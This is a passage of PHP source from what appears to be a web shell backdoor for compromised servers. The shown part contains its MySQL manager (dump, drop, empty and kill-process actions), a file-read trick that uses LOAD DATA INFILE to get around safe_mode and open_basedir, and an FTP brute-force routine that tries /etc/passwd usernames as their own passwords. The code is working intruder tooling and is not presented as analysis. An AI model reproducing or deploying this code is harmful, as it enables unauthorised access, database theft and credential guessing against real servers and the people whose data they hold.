 619         echo "\t-=[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]=-<br><br>\n";
 620         $c = 0;
 621         while ($row = mysql_fetch_array($result)) {
 622           $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
 623           $count_row = mysql_fetch_array($count);
 624           echo "\t<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
 625           mysql_free_result($count);
 626           $c++;
 627         }
 628         if (!$c) { echo "No tables found in database"; }
 629       }
 630     }
 631 ?>
 632     </td>
 633     <td>
 634 <?php
 635     #Start center panel
 636     $diplay = TRUE;
 637     if (@$sql_db) {
 638       if (!is_numeric($c)) { $c = 0; }
 639       if ($c == 0) { $c = "no"; }
 640       echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
 641       if (count(@$dbquicklaunch) > 0) {
 642         foreach($dbsqlquicklaunch as $item) {
 643           echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
 644         }
 645       }
 646       echo "</b></center>\n";
 647       $acts = array("","dump");
 648       if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
 649       elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
 650       elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
 651       elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
 652       elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
 653       elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
 654       elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
 655       elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
 656       elseif ($sql_tbl_act == "insert") {
 657         if ($sql_tbl_insert_radio == 1) {
 658           $keys = "";
 659           $akeys = array_keys($sql_tbl_insert);
 660           foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
 661           if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
 662           $values = "";
 663           $i = 0;
 664           foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
 665           if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
 666           $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
 667           $sql_act = "query";
 668           $sql_tbl_act = "browse";
 669         }
 670         elseif ($sql_tbl_insert_radio == 2) {
 671           $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
 672           $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
 673           $result = mysql_query($sql_query) or print(mysql_smarterror());
 674           $result = mysql_fetch_array($result, MYSQL_ASSOC);
 675           $sql_act = "query";
 676           $sql_tbl_act = "browse";
 677         }
 678       }
 679       if ($sql_act == "query") {
 680         echo "<hr size=\"1\" noshade>";
 681         if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 682         if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 683         if ((!$submit) or ($sql_act)) { echo "<table><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
 684       }
 685       if (in_array($sql_act,$acts)) {
 686         ?>
 687 
 688 
 689     <table>
 690         <tr>
 691         <td>
 692         <b>Create new table:</b>
 693         <form action="<?php echo $surl; ?>">
 694             <input type="hidden" name="act" value="sql">
 695             <input type="hidden" name="sql_act" value="newtbl">
 696             <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
 697             <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
 698             <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
 699             <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
 700             <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
 701             <input type="text" name="sql_newtbl" size="20">
 702             Fields: <input type="text" name="sql_field" size="3">
 703             <input type="submit" value="Create">
 704         </form>
 705         </td>
 706         <td><b>Dump DB:</b>
 707         <form action="<?php echo $surl; ?>">
 708             <input type="hidden" name="act" value="sql">
 709             <input type="hidden" name="sql_act" value="dump">
 710             <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
 711             <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
 712             <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
 713             <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
 714             <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
 715             <input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">
 716             <input type="submit" name="submit" value="Dump">
 717         </form>
 718         </td>
 719         </tr>
 720     </table>
 721 <?php
 722         if (!empty($sql_act)) { echo "<hr size=\"1\" noshade>"; }
 723         if ($sql_act == "newtbl") {
 724           echo "<b>";
 725           if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
 726             echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
 727           }
 728           else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
 729         }
 730         elseif ($sql_act == "dump") {
 731           if (empty($submit)) {
 732             $diplay = FALSE;
 733             echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
 734             echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
 735             $v = join (";",$dmptbls);
 736             echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
 737             if ($dump_file) {$tmp = $dump_file;}
 738             else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
 739             echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
 740             echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
 741             echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
 742             echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
 743             echo "</form>";
 744           }
 745           else {
 746             $diplay = TRUE;
 747             $set = array();
 748             $set["sock"] = $sql_sock;
 749             $set["db"] = $sql_db;
 750             $dump_out = "download";
 751             $set["print"] = 0;
 752             $set["nl2br"] = 0;
 753             $set[""] = 0;
 754             $set["file"] = $dump_file;
 755             $set["add_drop"] = TRUE;
 756             $set["onlytabs"] = array();
 757             if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
 758             $ret = mysql_dump($set);
 759             if ($sql_dump_download) {
 760               @ob_clean();
 761               header("Content-type: application/octet-stream");
 762               header("Content-length: ".strlen($ret));
 763               header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
 764               echo $ret;
 765               exit;
 766             }
 767             elseif ($sql_dump_savetofile) {
 768               $fp = fopen($sql_dump_file,"w");
 769               if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
 770               else {
 771                 fwrite($fp,$ret);
 772                 fclose($fp);
 773                 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
 774               }
 775             }
 776             else {echo "<b>Dump: nothing to do!</b>";}
 777           }
 778         }
 779         if ($diplay) {
 780           if (!empty($sql_tbl)) {
 781               if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
 782               $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
 783               $count_row = mysql_fetch_array($count);
 784               mysql_free_result($count);
 785               $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
 786                 $tbl_struct_fields = array();
 787                 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
 788               if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
 789               if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
 790               if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
 791               if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
 792               $perpage = $sql_tbl_le - $sql_tbl_ls;
 793               if (!is_numeric($perpage)) { $perpage = 10; }
 794               $numpages = $count_row[0]/$perpage;
 795               $e = explode(" ",$sql_order);
 796               if (count($e) == 2) {
 797                 if ($e[0] == "d") { $asc_desc = "DESC"; }
 798                 else { $asc_desc = "ASC"; }
 799                 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
 800               }
 801               else {$v = "";}
 802               $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
 803               $result = mysql_query($query) or print(mysql_smarterror());
 804               echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
 805               echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> &nbsp; ";
 806               echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> &nbsp; ";
 807               echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";
 808               echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";
 809               if ($sql_tbl_act == "structure") { echo "<b>Under construction!</b>"; }
 810               if ($sql_tbl_act == "insert") {
 811                 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
 812                 if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
 813                 else {
 814                   echo "<br><br><b>Inserting row into table:</b><br>";
 815                   if (!empty($sql_tbl_insert_q)) {
 816                     $sql_query = "SELECT * FROM `".$sql_tbl."`";
 817                     $sql_query .= " WHERE".$sql_tbl_insert_q;
 818                     $sql_query .= " LIMIT 1;";
 819                     $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
 820                     $values = mysql_fetch_assoc($result);
 821                     mysql_free_result($result);
 822                   }
 823                   else {$values = array();}
 824                   echo "<form method=\"POST\"><table width=\"1%\"><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
 825                   foreach ($tbl_struct_fields as $field) {
 826                     $name = $field["Field"];
 827                     if (empty($sql_tbl_insert_q)) {$v = "";}
 828                     echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
 829                     $i++;
 830                   }
 831                   echo "</table><br>";
 832                   echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
 833                   if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
 834                   echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
 835                 }
 836               }
 837               if ($sql_tbl_act == "browse") {
 838                 $sql_tbl_ls = abs($sql_tbl_ls);
 839                 $sql_tbl_le = abs($sql_tbl_le);
 840                 echo "<hr size=\"1\" noshade>";
 841                 echo "<img src=\"".$surl."act=img&img=multipage\" alt=\"Pages\"> ";
 842                 $b = 0;
 843                 for($i=0;$i<$numpages;$i++) {
 844                   if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
 845                   echo $i;
 846                   if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
 847                   if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
 848                   else { echo " "; }
 849                 }
 850                 if ($i == 0) {echo "empty";}
 851                 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
 852                 echo "<br><form method=\"POST\">\n";
 853                 echo "<table><tr>";
 854                 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
 855                 for ($i=0;$i<mysql_num_fields($result);$i++) {
 856                   $v = mysql_field_name($result,$i);
 857                   if ($e[0] == "a") {$s = "d"; $m = "asc";}
 858                   else {$s = "a"; $m = "desc";}
 859                   echo "<td>";
 860                   if (empty($e[0])) {$e[0] = "a";}
 861                   if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
 862                   else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
 863                   echo "</td>";
 864                 }
 865                 echo "<td><font color=\"green\"><b>Action</b></font></td>";
 866                 echo "</tr>";
 867                 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
 868                   echo "<tr>";
 869                   $w = "";
 870                   $i = 0;
 871                   foreach ($row as $k=>$v) {
 872                     $name = mysql_field_name($result,$i);
 873                     $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
 874                   }
 875                   if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
 876                   echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
 877                   $i = 0;
 878                   foreach ($row as $k=>$v) {
 879                     $v = htmlspecialchars($v);
 880                     if ($v == "") { $v = "<font color=\"green\">NULL</font>"; }
 881                     echo "<td>".$v."</td>";
 882                     $i++;
 883                   }
 884                   echo "<td>";
 885                   echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a> ";
 886                   echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
 887                   echo "</td>";
 888                   echo "</tr>";
 889                }
 890                mysql_free_result($result);
 891                echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" alt=\" ^ \"><select name=\"sql_act\">";
 892                echo "<option value=\"\">With selected:</option>";
 893                echo "<option value=\"deleterow\">Delete</option>";
 894                echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
 895             }
 896          }
 897          else {
 898            $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
 899            if (!$result) { echo mysql_smarterror(); }
 900            else {
 901 ?>
 902 
 903 
 904     <form method="POST">
 905     <table>
 906         <tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>
 907 <?php
 908              $i = 0;
 909              $tsize = $trows = 0;
 910              while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
 911                $tsize += $row["Data_length"];
 912                $trows += $row["Rows"];
 913                $size = view_size($row["Data_length"]);
 914 ?>
 915 
 916 
 917         <tr>
 918             <td><input type="checkbox" name="boxtbl[]" value="<?php echo $row["Name"]; ?>"></td>
 919             <td><a href="<?php echo $sql_surl; ?>sql_tbl=<?php echo urlencode($row["Name"]); ?>"><b><?php echo $row["Name"]; ?></b></a></td>
 920             <td><?php echo $row["Rows"]; ?></td><td><?php echo $row["Engine"]; ?></td><td><?php echo $row["Create_time"]; ?></td><td><?php echo $row["Update_time"]; ?></td><td><?php echo $size; ?></td>
 921             <td><a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DELETE FROM `".$row["Name"]."`"); ?>">Empty</a>&nbsp;<a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DROP TABLE `".$row["Name"]."`"); ?>">Drop</a>&nbsp;<a href="<?php echo $sql_surl; ?>sql_tbl_act=insert&sql_tbl=<?php echo $row["Name"]; ?>">Insert</a></td>
 922         </tr>
 923 <?php
 924                $i++;
 925              }
 926              echo "\t\t<tr>\n".
 927                    "\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
 928 ?>
 929 
 930 
 931         </tr>
 932     </table>
 933     <div align="right">
 934     <select name="sql_act">
 935         <option value="">With selected:</option>
 936         <option value="tbldrop">Drop</option>
 937         <option value="tblempty">Empty</option>";
 938         <option value="tbldump">Dump</option>";
 939         <option value="tblcheck">Check table</option>";
 940         <option value="tbloptimize">Optimize table</option>";
 941         <option value="tblrepair">Repair table</option>";
 942         <option value="tblanalyze">Analyze table</option>";
 943     </select>
 944     <input type="submit" value="Confirm">
 945     </div>
 946     </form>
 947 <?php
 948              mysql_free_result($result);
 949            }
 950          }
 951        }
 952      }
 953    }
 954    else {
 955         $acts = array("","newdb","serverstatus","servervars","processes","getfile");
 956         if (in_array($sql_act,$acts)) {
 957 ?>
 958 
 959 
 960     <table>
 961         <tr>
 962         <td><b>Create new DB:</b>
 963         <form action="<?php echo $surl; ?>">
 964             <input type="hidden" name="act" value="sql">
 965             <input type="hidden" name="sql_act" value="newdb">
 966             <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
 967             <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
 968             <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
 969             <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
 970             <input type="text" name="sql_newdb" size="20">
 971             <input type="submit" value="Create">
 972         </form>
 973         </td>
 974         <td><b>View File:</b>
 975         <form action="<?php echo $surl; ?>">
 976             <input type="hidden" name="act" value="sql">
 977             <input type="hidden" name="sql_act" value="getfile">
 978             <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
 979             <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
 980             <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
 981             <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
 982             <input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">
 983             <input type="submit" value="Get">
 984         </form>
 985         </td>
 986         </tr>
 987     </table>
 988 <?php
 989        }
 990        ###[ SQL ACTIONS ]###
 991        if (!empty($sql_act)) {
 992          echo "<hr size=\"1\" noshade>";
 993          if ($sql_act == "newdb") {
 994            echo "<b>";
 995            if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
 996            else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
 997          }
 998          if ($sql_act == "serverstatus") {
 999            $result = mysql_query("SHOW STATUS", $sql_sock);
1000            echo "<center><b>Server-status variables:</b><br><br>";
1001            echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
1002            while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1003            echo "</table></center>";
1004            mysql_free_result($result);
1005          }
1006          if ($sql_act == "servervars") {
1007            $result = mysql_query("SHOW VARIABLES", $sql_sock);
1008            echo "<center><b>Server variables:</b><br><br>";
1009            echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
1010            while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1011            echo "</table>";
1012            mysql_free_result($result);
1013          }
1014          if ($sql_act == "processes") {
1015            if (!empty($kill)) {
1016              $query = "KILL ".$kill.";";
1017              $result = mysql_query($query, $sql_sock);
1018              echo "<b>Process #".$kill." was killed.</b>";
1019            }
1020            $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1021            echo "<center><b>Processes:</b><br><br>";
1022            echo "<table><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1023            while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1024            echo "</table>";
1025            mysql_free_result($result);
1026          }
1027          if ($sql_act == "getfile") {
1028            $tmpdb = $sql_login."_tmpdb";
1029            $select = mysql_select_db($tmpdb);
1030            if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1031            if ($select) {
1032              $created = FALSE;
1033              mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1034              mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1035              $result = mysql_query("SELECT * FROM tmp_file;");
1036              if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1037              else {
1038                for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1039                $f = "";
1040                while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1041                if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1042                else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1043                mysql_free_result($result);
1044                mysql_query("DROP TABLE tmp_file;");
1045              }
1046            }
1047            mysql_drop_db($tmpdb);
1048          }
1049        }
1050      }
1051     }
1052 ?>
1053 
1054 
1055     </td>
1056     </tr>
1057 <?php
1058     if ($sql_sock) {
1059       $affected = @mysql_affected_rows($sql_sock);
1060       if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1061       echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1062     }
1063 ?>
1064 </table>
1065 <!-- End of SQL Manager -->
1066 <?php
1067   }
1068   if ($act == "ftpquickbrute") {
1069     echo "<table>\n";
1070     echo "<tr><td class=\"barheader\" colspan=2>.: Ftp Quick Brute :.</td></tr>";
1071     echo "<tr><td>";
1072     if (!empty($submit)) {
1073       if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1074       $fp = fopen("/etc/passwd","r");
1075       if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1076       else {
1077         if ($fqb_logging) {
1078           if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1079           else {$fqb_logfp = FALSE;}
1080           $fqb_log = "FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1081           if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1082         }
1083         @ob_flush();
1084         $i = $success = 0;
1085         $ftpquick_st = getmicrotime();
1086         while(!feof($fp)) {
1087           $str = explode(":",fgets($fp,2048));
1088           if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
1089             echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1090             $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1091             if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1092             $success++;
1093             ob_flush();
1094           }
1095           if ($i > $fqb_lenght) {break;}
1096           $i++;
1097         }
1098         if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; }
